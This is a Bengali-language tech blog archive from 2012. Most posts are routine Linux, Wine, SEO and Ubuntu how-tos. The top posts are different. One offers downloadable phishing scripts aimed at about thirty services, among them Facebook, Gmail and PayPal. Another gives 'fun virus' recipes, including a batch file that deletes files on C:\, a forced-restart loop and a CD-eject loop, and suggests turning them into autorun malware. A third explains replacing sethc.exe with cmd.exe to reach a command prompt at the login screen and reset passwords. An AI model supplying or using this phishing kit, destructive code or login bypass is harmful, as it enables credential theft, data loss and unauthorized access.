Sunday, June 17, 2012

নিজেই যখন হ্যাকার : Phising Script


হ্যাকিংয়ের মাধ্যমে পাসওয়ার্ড জানার জন্য সবচেয়ে ব্যবহৃত পদ্ধতি মনে হয় ফিশিং। তবে অনেকেই যারা বিভিন্ন সাইটের ফিশিং স্ক্রিপ্ট খুজে পাচ্ছেন না তারা চাইলে নিচের লিংক থেকে ডাউনলোড করে নিতে পাররেন। তবে যে কোন প্রকার হ্যাকিং থেকেই বিরত থাকা উচিৎ।

***ডাউলোড***


1. Facebook
2. Myspace.
3. Yahoo.
4. Gmail.
5. AOL.
6. Ebay.
7. Rapidshare.
8. Skype.
9. Paypal. 9. Paypal.
10. Megaupload.
11. Youtube.
12. ICQ.
13. Everquest.
14. Firefront.
15. Itunes.
16. Photobucket.
17. Plesk.
18. Ripway.
19. Siteworld.
20. Nexon.
21. Dailymotion.
22. Habbohotel.
23. Packstation.
24. Usenext.
25. MMO Cheats.
26. d2sp.
27. Oxedion.
28. Steam Phishing Site.
29. Stratro.
30. VanGuard.

নিজেই যখন হ্যকার


CD-রম ওপেনারঃ এটি মুলত আপনার CD-রমকে বারবার খুলবে আর বন্ধ করবে। এটা অনেক মজার একটা ভাইরাস। তবে এটা কম্পিউটারের কোনো ক্ষতি করে না। আর এই ভাইরাসের ক্রিয়া বন্ধ করার জন্য টাস্ক ম্যানেজার (CTRL+ALT+DELETE) চালু করে 'Processes'অপশনে ক্লিক করুন। সেখানে wscript.exe নামে যে ফাইলটি পাবেন সেটা সিলেক্ট করে 'End Process'এ ক্লিক করলেই হবে। নাহলে বারবারই আপনার রম ওপেন হতে থাকবে।

প্রথম ধাপঃ নোটপ্যাড ওপেন করে নিচের কোডটি কপি করুন।
do
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection

if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
loop
দ্বিতীয় ধাপঃ এবার .vbs একে এক্সটেনশনে সেভ করুন। আপনার ভাইরাস তৈরী হয়ে গেল।
তৃতীয় ধাপঃ এবার এতে ডাবল ক্লিক করুন। আর মজা =)) দেখুন।


কম্পিউটার রিস্টার্ট ভাইরাসঃ এটি আপনার কম্পিউটারকে বারবার রিস্টার্ট দিতে থাকবে। তবে এটা প্রয়োগ করার সময় একটু সাবধান থাকবেন।

প্রথম ধাপঃ নোটপ্যাড ওপেন করে নিচের কোডটি কপি করুন।
@echo off shutdown -r -f -t 00
দ্বিতীয় ধাপঃ এবার একে .bat এক্সটেনশনে সেভ করুন। আপনার ভাইরাস তৈরী হয়ে গেল।
তৃতীয় ধাপঃ এবার এতে ডাবল ক্লিক করুন। আর মজা দেখুন।

উইন্ডোজ ক্র্যাশারঃ এই ভাইরাসটি আপনার কম্পিউটারের বারটা বাজানোর জন্য যথেষ্ট। তবে এ ভাইরাসটা না বানানোই ভাল। কারণ এটি একবার কাজ শুরু করলে উইন্ডোজ সেট আপ দেয়া ছাড়া আর কোনো উপায় নাই।

প্রথম ধাপঃ প্রথম ধাপঃ নোটপ্যাড ওপেন করে নিচের কোডটি কপি করুন।
@Echo off
Del C:\ *.* y
দ্বিতীয় ধাপঃ এবার একে .bat এক্সটেনশনে সেভ করুন। আপনার ভাইরাস তৈরী হয়ে গেল।
তৃতীয় ধাপঃ এবার এতে ডাবল ক্লিক করুন। আর মজা দেখুন।

স্পীকিং কম্পিউটার ভাইরাসঃ এটাকে মূলত ভাইরাস না বলে একটা মজার গেইম ও বলা যেতে পারে। এর দ্বারা আমরা আমাদের কম্পিউটারকে দিয়ে যা খুশি বলাতে পারি।

প্রথম ধাপঃ নোটপ্যাড ওপেন করে নিচের কোডটি কপি করুন।
Dim msg, sapi
msg=InputBox("Enter your text","My text to speak")
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
দ্বিতীয় ধাপঃ এবার একে .vbs এক্সটেনশনে সেভ করুন।
তৃতীয় ধাপঃ এবার এতে ডাবল ক্লিক করুন। একটা বক্স আসবে।
চতুর্থ ধাপঃ এতে আপনার পছন্দমত টেক্সট টাইপ করে OK করুন। এর আগে কম্পিউটার স্পিকার চালু করুন অথবা হেডফোন কানে নিন। আর মজা দেখুন।

যে কোডগুলোর কথা বললাম সেগুলোর প্রথমে সেগুলোকে অটোরান ফরম্যাটে সেভ করে আরও নতুন কিছু কমান্ড যোগ করলেই ভাইরাসগুলো প্রফেশনাল ভাইরাস হয়ে যাবে। এ ভাইরাসগুলোই আসলে আমাদের কম্পিউটারকে আক্রান্ত করে ।

WIndows 7 er password ভুলে গেলে কি করবেন?

আমরা মোটামুটি সবাই নিজস্ব নিরাপত্তার জন্য কম্পুতে পাসওয়ার্ড দিয়ে থাকি। কিন্তু সমস্যা হয় তখনই যখন আমরা এর পাসওয়ার্ড ভুলে যায় বা যদি কেউ এর পাসওয়ার্ড চেন্জ করে দেয়। তখন হয়তো আমরা বিভিন্ন পদ্ধতিতে পাসওয়ার্ড রিকোভারি করি বা নতুন করে উইন্ডোস সেট আপ দেয়। কিন্তু এসব এর কিছুই করা লাগে না যদি আমরা একটা কাজ আগে থেকেই করে ফেলি।
আমরা ২ অবস্থায় এই সমস্যায় পড়তে পারি।
  • ১: আপনি লগইন থাকা অবস্থায়
  • ২: আপনার কম্পু অন করতে গিয়ে দেখলেন যে পাসওয়ার্ড ভুলে গেছেন
এখন আসি কিভাবে ভুলে যাওয়া পাসওয়ার্ড চেন্জ করা যায়

আপনি লগইন থাকা অবস্থায়

আমরা পাসওয়ার্ড চেন্জ করবো command prompt এর মাধ্যমে।
  • ১। start এ গিয়ে run যান তারপর cmd লিখে enter বাটন চাপুনএ
  • ২। এবার cmd তে লিখেন : net user username *
    যেমন আমার username হচ্ছে microbes তাহলে আমি লিখবো net user microbes * ( প্রত্যেক শব্দের শেষে স্পেস দিতে ভুলবেন না কিন্তু)।
  • ৩। এন্টার চাপার পর আপনাকে পাসওয়ার্ড টাইপ করতে বলবে। মনে রাখবেন পাসওয়ার্ড টাইপ করার সময় কিন্তু আপনার টাইপ করা লিখা দেখাবেনা। পাসওয়ার্ড লিখা শেষ হলে এন্টার চাপুন । আবার আপনাকে পাসওয়ার্ড রিটাইপ করতে বলবে। রিটাইপ করা হলে এন্টার চাপুন। আপনার সব কাজ ঠিক থাকলে নিচের মতো চিএ পাবেন


দেখলেন কিভাবে আগের পাসওয়ার্ড না জেনে নতুন পাসওয়ার্ড দিলাম।

লগ ইন ই করতে না পারলে কমান্ড প্রম্পট পাবেন যেভাবে বা আপনার কম্পু অন করতে গিয়ে দেখলেন যে পাসওয়ার্ড ভুলে গেছেন

এবার মনে হয় একটু সমস্যায় পড়ার কথা । কারণ আগেরবার লগ ইন থাকার কারণে আমরা সহজেই command prompt পেয়ে গেছি। কিন্তু আমরা log on sereen এ command prompt পায়না। তাই আসুন দেখি কিভাবে log on sereen এ command prompt আনা যায়।
এ কাজটি একটু জটিল। আমি যথাসাধ্য চেস্টা করেছি চিএের মাধ্যমে কাজটি সহজ করে তোলার
  • ১। start বাটন চেপে search এ লিখুন cmd ।
  • ২। সবার উপরে দেখুন cmd.exe আসছে । এবার তার উপর ডান বাটন ক্লিক করে run as administrator ক্লিক করুন।
  • ৩। এবার cmd.exe কপি করে আপনার ডেস্কটপে সেভ করুন এবং sethc.exe নাম দিয়ে রিনেম করুন।
  • ৩। এবার C:\windows\system32 এ যান । সেখানে sethc.exe খঁজে বের করুন। সহজে বের করার জন্য নিচের চিএ দেখুন

৪। এখন আমাদের কাজ হবে system32 থাকা sethc.exe ফাইল কে রিপলেস করে আমাদের ডেস্কটপে থাকা sethc.exe ( cmd.exe ) কে বসানো। এজন্য দরকার system32 থাকা sethc.exe কে কপি করে অন্য কোনো ফোল্ডারে রাখা। কিন্তু এই sethc.exe কে আমরা কপি করে অন্য কোনো ফোল্ডারে রাখতে গেলে নিচের মতো চিএ দেখতে পাবে

এর কারণ হচ্ছে system32 এ থাকা কোনো কিছুই আমাদের চেন্জ করার পারমিসন নেই।

চলুন এবার পারমিশন নিয়ে নেই

  • ৫। system32 থাকা sethc.exe এর উপর ডান বাটন ক্লিক করে run as administrator ক্লিক করুন ।
  • ৬। আবার sethc.exe এর উপর ডান বাটন ক্লিক করে properties এ যান । তারপর security tab> advanced >owner tab এ গিয়ে edit
    এ ক্লিক করুন। সেখানে গিয়ে দেখবেন owner দেওয়া আছে TrustedInstaller । এখন আপনি ownership "TrustedInstaller" থেকে administrator এ পরিবর্তন করুন তারপর apply চাপুন ।

নিচের চিএ গুলো দেখুন

 







৫। এবার security tab এর Edit এ যান 'Administrators' এ ক্লিক করে full control এ টিক মার্ক দিন এবং apply বাটন ক্লিক করুন।
নিচের চিএ দেখুন


  • ৬।এখন আপনি sethc.exe কে কপি করে অন্য কোনো ফোল্ডারে পেস্ট করুন এবং ডেস্কটপে থাকা sethc.exe ( cmd.exe ) কে কপি করে system32 এ পেস্ট করুন ।
ব্যস আপনার কাজ শেষ। এবার আপনি কম্পু রিস্টার্ট দিন । তারপর লগ অন স্ক্রীন এ পাসওয়ার্ড চাইলে ৫ বার shift key চাপুন । দেখবেন command prompt চলে এসেছে । নিচের চিএ দেখুন

command prompt চলে আসছে এখন আবার আগের মতো কাজ করে নতুন পাসওয়ার্ড দিন।



Saturday, June 16, 2012

SEO TIPS::অধিক ভিজিটরের জন্য আপনার সাইটে যোগ করুন META TAG


অনেকেই হয়ত জানেন না META TAG কি ।?
মেটা ট্যাগ হল এমন কিছূ ট্যাগ যা সার্চ ইন্জিনকে আপনার সাইটের ব্যাপারে তথ্য সরবরাহ করবে।SEO এর জন্য মেটা ট্যাগ খুবই জরুরী।মেটা ট্যাগের সাহায্যে সার্চ ইন্জিনগুলো সঠিকভাবে কোন সাইটের ইনডেক্সিং করতে পারে।আপনার সাইটে যদি সার্চ ইন্জিন হতে বেশী বেশী ভিজিটর আশা করেত তাহলে মেটা ট্যাগের কোন বিকল্প নাই।
মেটা ট্যাগের Description আর Keyword এই দুটি খুবই জরুরী ।
এবার আসি Description কি?Description হল আপনার সাইটের বর্ননা মানে আপনি কি নিয়ে সাইটটি তৈরী করেছেন তার বর্ননা এখানে লিখবেন।আর Keyword হল আপনার সাইটের প্রধান Word গুলো ।যেমন টেকটিউনস এর জন্য কি ওয়ার্ড হতে পারে bangla-blogging,technology,blog ইত্যাদি।
আমি এখানে ব্লগারে কি করে মেটা ট্যাগ যোগ করতে হয় তা দেখাচ্ছি ।অন্যগুলো প্রায় একই।
তাহলে চলুন কাজ শুরু করি।প্রথমে আপনার ব্লগারে লগিন করুন এবার LAYOUT এবার EDIT HTML এ ক্লিক করুন।এবার নিচে দেখুন আপনার ব্লগের সমস্ত কোড গুলো দেয়া আছে ।
আপনার সাইটের একদম প্রথমেই নিচের কোডটি খূজে বের করুন


এবার উপরের কোডটির ঠিক নিচে এই কোডটি যোগ করুন


যোগ করার পর নিচের ছবির মত হবে


DESCRIPTION HERE:আপনার সাইটের বর্ননা লিখুন
KEYWORDS:আপনার সাইটের কিওয়ার্ড লিখূন
AUTHOR NAME:আপনার নাম লিখূন

এবার আপনি আপনার মত করে description ,keyword দিয়ে দিন।ব্যাস কাজ হয়েগেল।উদাহরণ হিসেবে নিচেরটা দেখতে পারেন


Wednesday, June 13, 2012

উবুন্টু ১২.০৪ সহ অন্যান্য ডিস্ট্রিবিউশনের জন্য গ্রাফিকাল ওয়াইম্যাক্স কানেকশন ম্যানেজার


গতবছরের সেপ্টেম্বর মাসের ৫ তারিখে বাংলাদেশে লিনাক্সের প্রচার ও প্রসারে নতুন একটি দিক উন্মোচিত হয়। সেটা হল বাংলালায়ন কোম্পানির তিনটি ডিভাইস লিনাক্সের ৩২বিট প্লাটফর্মে চালানো সম্ভব হয়। তারপর জনসাধারণের জন্য যেসব প্যাকেজ (৪টি) রিলিজ করা হয় সেগুলো শুধুমাত্র উবুন্টু/সমমানের ডেবিয়ান ডিস্ট্রিবিউশনের জন্য প্রযোজ্য ছিল। তার পরবর্তী ৬-৭ মাসে প্রচুর ইউজার ফীডব্যাক, সাজেশন, ট্রিক ইত্যাদি পর্যালোচনা করে পুরো সিস্টেমটি কমান্ডলাইন ও পাসওয়ার্ডের ঝামেলা থেকে সরিয়ে পুরো গ্রাফিকাল প্রোজেক্টে নেওয়া হয়েছে। সেই সাথে যুক্ত হয়েছে উবুন্টু বাদে আরো কয়েকটি ডিস্ট্রিবিউশনের জন্য সাপোর্ট যেন ইউজার নিজের পছন্দমত এনভায়রনমেন্টে কাজ করার সুযোগ পায়। প্রোজেক্টটি সম্পুর্ণ ওপেন সোর্স এবং ফ্রি (এবং অবশ্যই নন-কমার্শিয়াল)। পরবর্তীতে এর সাথে আরো কিছু ফিচার যুক্ত করার ইচ্ছা রয়েছে আমাদের। এখন গ্রাফিকাল ওয়াইম্যাক্স কানেকশন ম্যানেজারের ডাউনলোড, ইন্সটল করার নিয়ম, ব্যবহার ইত্যাদি সম্পর্কে বলছি।

Thursday, June 7, 2012

Add/Remove program installed with Wine?


Q. How do I uninstall Windows applications?
A. You can run Wine's uninstaller command; this is like Windows' "Add/Remove Programs" function. It should remove menu and desktop entries... but it's not well tested; it might not work with all apps. See below for a reliable way to remove *all* Windows apps.

Q. How do I uninstall *all* Windows applications?
A. To remove all programs installed under Wine, remove the wineprefix (usually the ~/.wine directory) by pasting the following command into a terminal:
rm -rf $HOME/.wine
But that doesn't remove them from the system menu; to clean out the menus, carefully paste the following commands into a terminal:
rm -f $HOME/.config/menus/applications-merged/wine*
rm -rf $HOME/.local/share/applications/wine
rm -f $HOME/.local/share/desktop-directories/wine*
rm -f $HOME/.local/share/icons/????_*.{xpm,png}
rm -f $HOME/.local/share/icons/*-x-wine-*.{xpm,png}

Q. How do I uninstall Wine?
A. If you installed Wine with your distribution's package manager, use the package manager again to uninstall Wine. (If you installed Wine from source, then use make uninstall in the source directory to remove it.)
This won't uninstall your Windows apps, though; see above for that.

Saturday, June 2, 2012

Windows এর Software Ubuntu তে কিভাবে ব্যবহার করা যায়।(ছবি সহ)

Windows এর অনেক software আসে যাদের জন্য Linux এ ভাল কোন বিকল্প software খুজে পাওয়া যায়না। যেমন Tera Term, Packet Tracer. যারা Telecom sector এ আসেন তাদের জন খুবি উপকারি একটা software Tera Term. Router, switch configure, telnet, ping ইতাদি কাজে এটা খুব বাবহার হয়। উবুন্তুতে এর একটা বিকল্প soft আছে, PuTTY কিন্তু তা দিয়ে সব কাজ করা যায়না। আর যারা CCNA করছেন তাদের জন্য P.Tracer must. (P.T এর ubuntu version আছে)। খুজতে খুজতে পেয়ে গেলাম কিভাবে ubuntu তে windows এর software use করা যায়। এবার আসুন তাহলে দেখা যাক কিভাবে এই কাজটি করা যায়...
১। প্রথমে http://www.winehq.org/ এই address এ যেয়ে download option এ click করুন।

কিভাবে উবুন্তুতে window button (close,minimize,maximize) গুলো ডানে সরানো যায়?


সাধারনত উবুন্তুতে window button (close,minimize,maximize) গুলো হাতের বা দিকে থাকে। যারা অনেক দিন ধরে windows বাবহার করছেন তাদের জনে এটা একটা বিরক্তির কারন হয়। ভুল বসত mouse দিয়ে হাতের ডানে button গুল খুজতে থাকি। এই সমসসা থেকে মুক্তির জন আমরা খুব সহজেই button গুলকে ডানে নিয়ে আসতে পারি।
১। প্রথমে  Alt+F2 Press করে Run Application window টি open করুন।
২।  gconf-editor টাইপ করে Run click করুন।
৩। এবার  বা পাশের ঘর থেকে /apps/metacity/general যেয়ে button_layout সিলেক্ট করুন।

উবুন্টু/লিনাক্স মিন্টে টিভি দেখুন Tvtime সফটওয্যার ব্যবহার করে (সফল পদ্ধতি)


আমি অনেক চেষ্টা করে আমার Aver Media Super007 (M-135) টিভি কার্ডে Tvtime সফটওয্যার ব্যবহার করে টিভি দেখতে পেরেছি।
আর এজন্য ধন্যবাদ দিতে চাই প্রজন্ম ফোরামের অলোক ভাই কে এবং লিনাক্স ফোরামের অভ্রনীল ভাই কে।
যেভাবে টিভি দেখবেন:
*অবশ্যই টিভিকার্ডের সাথে অ্যান্টেনার তার অথবা ডিশ লাইন সংযুক্ত রাখুন।
এরপর Tvtime সফটওয়্যার টি ইনস্টল করুন:
*শুরুতেই ইন্টারনেটে কানেক্ট হয়ে নিন।
এরপর
System>Administration>Synaptic Package Manager সিলেক্ট করুন।পাসওয়ার্ড চাইবে,পাসওয়ার্ড দিয়ে Enter কী চাপুন।

উইন্ডোজ অপারেটিং সিস্টেমে চলা কোন পিসিতে উবুন্টু/মিন্ট সেটাপের পরে ডুয়েল বুট অপশন কাজ না করলে…..


অনেক সময়ই দেখা যায় উইন্ডোজ অপারেটিং সিস্টেমে চলা কোন পিসিতে উবুন্টু/মিন্ট সেট-আপ দিলে উবুন্টু/মিন্ট সেট-আপ হবাপ পরে ডুয়েল বুট কাজ করে না। পিসি চালু করলে সরাসরি উবুন্ট/মিন্ট চালু হয়ে যায়। আর এই সময়ে অনেকে ধারণা করে বসেন যে, উবুন্টু/মিন্ট সেটাপ দেবার কারণে উইন্ডোজটা বুঝি নষ্ট হয়ে গেল। আসলে ব্যাপার কিন্তু তা নয়..... আপনার উইন্ডোজ ঠিকই আছে। শুধু ছোট্ট একটা টেকনিক খাটানোই বাকি.....
আপনি যদি এই ধরনের সমস্যায় পড়েন তাহলে সোজা উবুন্টু/মিন্টের টার্মিনালে গিয়ে টাইপ করুন
sudo update-grub
এন্টার প্রেস করলে আপনার রুট পাসওয়ার্ড চাইবে। পাসওয়ার্ড দিয়ে আবার এন্টার হিট করুন।

লিনাক্স এ ডাউনলোড ম্যানেজার


এই কাজ করার জন্য আমরা কয়েকটি ধাপ সমাপ্ত করবো:
১ম ধাপঃ
ফায়ার ফক্স ব্রাউজারে  FlashGot নামে একটি এডঅন ইন্সটল করে ব্রাউজার রিসটার্ট করুন।
২য় ধাপঃ 
আমার মতে আইডিএম এর মত স্পিডি যদি কোন ডাউনলোড ম্যানেজার থাকে তা হল এরিয়া২(aria2)। কিন্তু এরিয়া২ তে কোন পজ/রিজিউম বাটন না থাকার কারনে আমার মত অনেকের কাছে গলার কাটা মনে হয়। তাহলে কি আমরা এরিয়া২ ব্যবহার করতে পারবোনা? হা ব্যবহার করবো কিন্তু ভিন্ন ভাবে, যাতে থাকবে এরিয়া২ এর স্পিড এবং পজ/রিজিউম বাটন।
এর জন্য সিনাপ্টিক প্যাকেজ ম্যানেজার চালু করে এরিয়া২ ইন্সটল করে নিন।

Friday, June 1, 2012

লিনাক্স মিন্ট এর জন্য কতিপয় প্রয়োজনীয় সফটওয়্যার ও তার ইন্সটলেশন।


লিনাক্স মিন্ট এর  জন্য কতিপয় প্রয়োজনীয় সফটওয়্যার ও তার ইন্সটলেশন (লিনাক্স মিন্ট ১০ “জুলিয়া” এ পরীক্ষিত।)
১।মোবাইল ভিডিও/অডিও কনভার্টারঃ অনেকেই এইরকম সফটওয়্যার খোজেন।বিশেষ করে যারা নতুন। আমিও এই সমস্যায় পরেছিলাম। তো যাই হোক আমি বর্তমানে মোবাইল ভিডীও/অডিও কনভার্টিং এর জন্য ২ টা সফটওয়্যার ব্যাবহার করি।
ক) মোবাইল মিডিয়া কনভার্টারঃ ইন্সটল করার জন্য গুগল এ mobile media converter লিখে সার্চ দিন। আশা করি একটা ডেব ফাইল পাবেন। ইন্সটল করে নিন।
খ) ট্রান্সমাজেডনঃ এটা আসলে একটা ভিডিও কোডার। চাইলে পিসির ফাইল এক ফরম্যাট থেকে আরেক ফরম্যাট এ নিতে পারেন।ইন্সটল করার জন্য টার্মিনালে লিখুনঃ sudo apt-get install transmageddon অথবা সাইনাপ্টিকে transmageddon লিখে সার্চ দিয়ে ইন্সটল করুন।

লিনাক্স এ Home partition অথবা Root partition খুব সহজেই Resize করুন Gparted Partition manager দিয়ে।


লিনাক্স এ পার্টিশন resize করতে অনেকেই সমস্যার সম্মুখিন হন। আপনার ইন্সটল করা Gparted partition manager  দিয়ে নরমাল ext4 linux ড্রাইভ সহজেই resize করতে পারেন, তবে লিনাক্স এর Home partition বা root partition এভাবে Gparted দিয়ে resize করা যায় না, কারন কম্পিউটার চালু থাকা অবস্থায় সেগুলো mounted অবস্থায় থাকে। ধরুন আপনার Root partition এ জায়গা প্রায় শেষ, সেজন্য আপনি নতুন সফট ইন্সটল করতে পারছেন না, আবার customization এর জন্য লিনাক্স নতুন ভাবে setup ও দিতে চাচ্ছেন না। অথবা Home partition  অযথাই বড় দিয়ে ফেলেছিলেন! এক্ষেত্রে Gparted 126 mb iso আলাদা ডিভিডি তে burn করে live boot এর মাধ্যমে home/root রিসাইজ করা যায়। তবে আপনি চাইলে লিনাক্স এর ডিভিডি অথবা ইউএসবি লাইভ বুট করে ও এটি করতে পারেন যেহেতু লিনাক্স iso তে gparted দেয়াই থাকে।

উবুন্টু তে বাংলা লিখা

উবুন্টু তে বাংলা লিখার কয়েকটি উপায় আছে……
তাদের মধ্যে সবচাইতে সহজ উপায় হতছে কি-বোর্ড লেআউট পাল্টে লেখা…..
উবুন্টু তে বিল্টইন ভাবে বাংলা এর জন্য ২ টা লেআউট দেয়া থাকে. যার একটি হতছে অন্যতম জনপ্রিয় লেআউট প্রভাতি .
দেখা যাক কি ভাবে এটি ব্যবহার করা যায়……..:)
প্রথমে ডেস্কটপ এর একেবারে ডান কোনার ড্রপডাওন মেনু থেকে সিস্টেম সেটিং 

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Hosted Desktop